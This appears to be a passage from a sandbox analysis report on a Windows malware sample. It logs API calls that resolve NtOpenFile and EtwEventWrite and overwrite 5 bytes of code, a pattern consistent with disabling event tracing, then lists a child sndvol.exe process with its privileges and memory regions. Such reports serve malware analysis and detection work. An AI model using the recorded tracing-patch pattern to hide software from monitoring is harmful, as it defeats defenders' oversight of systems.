[0143.423] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.424] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.424] GetProcAddress (hModule=0x771d0000, lpProcName="NtOpenFile") returned 0x77246fd0 [0143.424] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.428] GetCurrentProcess () returned 0xffffffff [0143.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.428] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.428] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0143.428] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.429] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.429] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWrite") returned 0x7722ae80 [0143.429] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.433] GetCurrentProcess () returned 0xffffffff [0143.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.433] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.433] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0143.433] ExitProcess (uExitCode=0x0) [0143.438] LocalFree (hMem=0x6e1608) returned 0x0 [0143.439] free (_Block=0x2209230) [0143.439] LocalFree (hMem=0x6e1770) returned 0x0 [0143.440] free (_Block=0x2205ae8) Thread: id = 6 os_tid = 0x808 Thread: id = 7 os_tid = 0x858 Thread: id = 8 os_tid = 0x8c Thread: id = 9 os_tid = 0x668 Thread: id = 10 os_tid = 0xc5c Thread: id = 11 os_tid = 0x10d4 Process: id = "2" image_name = "sndvol.exe" filename = "c:\\windows\\syswow64\\sndvol.exe" page_root = "0x716ac000" os_pid = "0xc60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13ac" cmd_line = "\"C:\\Windows\\System32\\SndVol.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 598 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 599 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 600 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 601 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 602 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 603 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 604 start_va = 0xf0000 end_va = 0xf2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 605 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 606 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 607 start_va = 0xb40000 end_va = 0xb76fff monitored = 0 entry_point = 0xb5a4b0 region_type = mapped_file name = "sndvol.exe" filename = "\\Windows\\SysWOW64\\SndVol.exe" (normalized: "c:\\windows\\syswow64\\sndvol.exe") Region: id = 608 start_va = 0xb80000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 609 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 610 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 611 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 612 start_va = 0x7fff0000 end_va = 0x7dfa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 613 start_va = 0x7dfa16770000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa16770000" filename = "" Region: id = 614 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 615 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 616 start_va = 0x110000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 617 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 618 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 619 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 620 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 621 start_va = 0x400000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 622 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 623 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 624 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 625 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 626 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 627 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 628 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 629 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 630 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 631 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 632 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 633 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 634 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 635 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 636 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 637 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 638 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 639 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 640 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 641 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 642 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 643 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 644 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 645 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 646 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 647 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 648 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 649 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 650 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 651 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 652 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 653 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 654 start_va = 0x6ed80000 end_va = 0x6eeeafff monitored = 0 entry_point = 0x6edee360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 655 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 656 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 768 start_va = 0x50480000 end_va = 0x504aefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000050480000" filename = "" Region: id = 770 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 771 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Thread: id = 12 os_tid = 0xc68 Thread: id = 13 os_tid = 0xc64 Thread: id = 14 os_tid = 0xc6c Thread: id = 15 os_tid = 0xcf0